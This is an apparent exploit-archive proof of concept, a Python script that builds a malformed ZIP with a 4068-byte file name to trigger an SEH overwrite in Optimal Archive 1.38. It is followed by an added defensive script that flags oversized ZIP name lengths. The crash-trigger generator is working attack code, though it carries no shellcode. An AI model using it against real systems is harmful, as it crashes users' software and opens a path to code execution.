Optimal Archive v1.38 .zip 0day SEH PoC

#!/usr/bin/python
# #######################################################################
# Title:                Optimal Archive 1.38 (.zip) 0day SEH PoC
# Author:               TecR0c - http://tecninja.net/blog & http://twitter.com/TecR0c
# Found by:             TecR0c
# Download:             http://www.optimalaccess.com/oadownload.php?version=oarchive.exe
# Platform:             Windows XP sp3 En
# Advisory:             http://www.corelan.be:8800/advisories.php?id=CORELAN-10-017
# Greetz to:            Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
# #######################################################################
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.

# Trigger : Right click on specially crafted zip file > Boom
# Very strange behavior when debugging

print   "|------------------------------------------------------------------|"
print   "|                         __               __                      |"
print   "|   _________  ________  / /___ _____     / /____  ____ _____ ___  |"
print   "|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |"
print   "| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |"
print   "| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |"
print   "|                                                                  |"
print   "|                                       http://www.corelan.be:8800 |"
print   "|                                              security@corelan.be |"
print   "|                                                                  |"
print   "|-------------------------------------------------[ EIP Hunters ]--|"
print   "[+] optimal (.zip) - by TecR0c"


# ZIP local file header (signature PK\x03\x04)
ldf_header = ("\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00"
"\xe4\x0f"    # 0x0fe4 = 4068 = len(buff) once built below
"\x00\x00\x00")

# ZIP central directory file header (signature PK\x01\x02)
cdf_header = ("\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\xe4\x0f"    # file name length: 0x0fe4 = 4068
"\x00\x00\x00\x00\x00\x00\x01\x00"
"\x24\x00\x00\x00\x00\x00\x00\x00")

# ZIP end of central directory record (signature PK\x05\x06)
eofcdf_header = ("\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00"
"\x12\x10\x00\x00"    # central directory size: 0x1012
"\x02\x10\x00\x00"    # central directory offset: 0x1002
"\x00\x00")

# File name field: starts with 2340 filler bytes (0x42)
buff = "\x42" * 2340
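buff += "\x44" * 4                      # 4 marker bytes (0x44) at offset 2340
buff += "\x42" * (4064-len(buff))       # pad to 4064 bytes
buff += ".txt"                          # 4068 bytes in total

# Binary mode so the bytes are written unmodified on Windows
mefile = open('optimal.zip','wb')
mefile.write(ldf_header + buff + cdf_header + buff + eofcdf_header)
mefile.close()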




TecR0c                                                                        03/31/2010
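
Added example (Python 3, not part of TecR0c's script or the Corelan advisory): a defender-side check that walks a ZIP central directory and reports entries whose declared file name length is over a limit, which is the property the archive above relies on (0x0fe4 = 4068 bytes). The 255-byte limit, the function names and both sample archives are assumptions constructed for this illustration.

```python
import io
import struct
import zipfile

MAX_NAME = 255                     # assumed policy limit for one file name
EOCD_SIG = b"PK\x05\x06"           # end of central directory record
CDH_SIG = b"PK\x01\x02"            # central directory file header
LFH_SIG = b"PK\x03\x04"            # local file header

def long_name_entries(data, limit=MAX_NAME):
    """Return [(central_len, local_len)] for entries whose declared file
    name length exceeds `limit` in either header. local_len is None when
    the local header cannot be read."""
    eocd = data.rfind(EOCD_SIG)
    if eocd < 0 or eocd + 22 > len(data):
        raise ValueError("no end-of-central-directory record")
    # total entries (u16), central directory size (u32) and offset (u32)
    count, _cd_size, pos = struct.unpack_from("<HII", data, eocd + 10)
    hits = []
    for _ in range(count):
        if pos + 46 > len(data) or data[pos:pos + 4] != CDH_SIG:
            raise ValueError("malformed central directory at %d" % pos)
        name_len, extra_len, comment_len = struct.unpack_from("<HHH", data, pos + 28)
        (lfh,) = struct.unpack_from("<I", data, pos + 42)
        local_len = None
        if lfh + 30 <= len(data) and data[lfh:lfh + 4] == LFH_SIG:
            (local_len,) = struct.unpack_from("<H", data, lfh + 26)
        if name_len > limit or (local_len or 0) > limit:
            hits.append((name_len, local_len))
        pos += 46 + name_len + extra_len + comment_len
    return hits

def make_zip(name):
    """Build a constructed single-entry archive in memory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(name, b"constructed sample")
    return buf.getvalue()

BENIGN = make_zip("notes.txt")               # constructed, ordinary name
OVERSIZED = make_zip("B" * 4064 + ".txt")    # constructed, 4068-byte name

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN), ("oversized", OVERSIZED)):
        print(label, long_name_entries(blob))
```

The check reads only the length fields, so it can run in a mail or upload filter before any archive library or shell extension touches the file.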

				